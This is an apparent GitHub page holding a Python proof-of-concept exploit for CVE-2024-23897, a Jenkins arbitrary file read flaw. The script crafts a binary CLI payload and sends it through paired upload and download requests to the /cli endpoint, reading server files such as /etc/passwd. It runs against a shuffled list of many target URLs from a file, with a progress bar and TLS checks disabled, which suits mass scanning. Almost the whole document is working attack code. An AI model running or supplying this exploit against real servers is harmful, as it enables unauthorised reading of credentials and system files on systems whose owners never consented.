-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2024-23897.py
110 lines (91 loc) · 3.58 KB
/
CVE-2024-23897.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
import requests
import argparse
import uuid
import threading
import urllib3
import subprocess
import random
from tqdm import tqdm
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
RED = '\033[91m'
GREEN = '\033[92m'
RESET = '\033[0m'
def parse_args():
parser = argparse.ArgumentParser(add_help=True, description='This is a POC for CVE-2024-23897 (Jenkins file read)')
parser.add_argument("-f", "--filename", type=str, required=True, help="Filename to be read on the Jenkins server")
parser.add_argument("-e", "--external_file", type=str, required=True, help="External file containing list of URLs")
parser.add_argument("-n", "--num_urls", type=int, default=1, help="Number of random URLs to select (default is 1)")
return parser.parse_args()
class UploadThread(threading.Thread):
def __init__(self, url, session, payload):
threading.Thread.__init__(self)
self.url = url
self.session = session
self.payload = payload
def run(self):
try:
r = requests.post(f'{self.url}/cli?remoting=false', headers={
"Session": self.session,
"Side": "upload",
"Content-type": "application/octet-stream"
}, data=self.payload, verify=False, timeout=3)
except Exception:
pass
class DownloadThread(threading.Thread):
def __init__(self, url, session):
threading.Thread.__init__(self)
self.result = None
self.url = url
self.session = session
def run(self):
try:
r = requests.post(f'{self.url}/cli?remoting=false', headers={
"Session": self.session,
"Side": "download",
}, verify=False, timeout=3)
self.result = r.text
except Exception:
pass
class CVE_2024_23897:
def __init__(self, url):
self.url = url
self.gen_session = lambda: str(uuid.uuid4())
def gen_payload(self, path):
payload = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@'
payload += path.encode()
payload += b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
return payload
def read(self, path='/etc/passwd'):
session = self.gen_session()
payload = self.gen_payload(path)
t1 = UploadThread(self.url, session, payload)
t2 = DownloadThread(self.url, session)
t1.start()
t2.start()
t1.join()
t2.join()
return t2.result
if __name__ == '__main__':
args = parse_args()
with open(args.external_file, 'r') as file:
urls = file.readlines()
random.shuffle(urls)
num_urls = len(urls)
progress_bar = tqdm(total=num_urls, desc="Progress", unit="URL")
for i, url in enumerate(urls, start=1):
url = url.strip()
progress_bar.update(1)
print(GREEN + f"[*] Working with URL {i}/{num_urls}: {url}" + RESET)
exp = CVE_2024_23897(url=url)
try:
subprocess.run(["java", "-jar", "jenkins-cli.jar", "-s", url, "help"], stderr=subprocess.DEVNULL)
data = exp.read(args.filename)
if data and "ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin" not in data:
print(f'[+] Data recovered from {url}:')
for line in data.split('\n')[:4]: # Displays only the first 4 lines of data; change as needed.
print(line)
else:
print("Data recovered: NONE")
except Exception:
pass
progress_bar.close()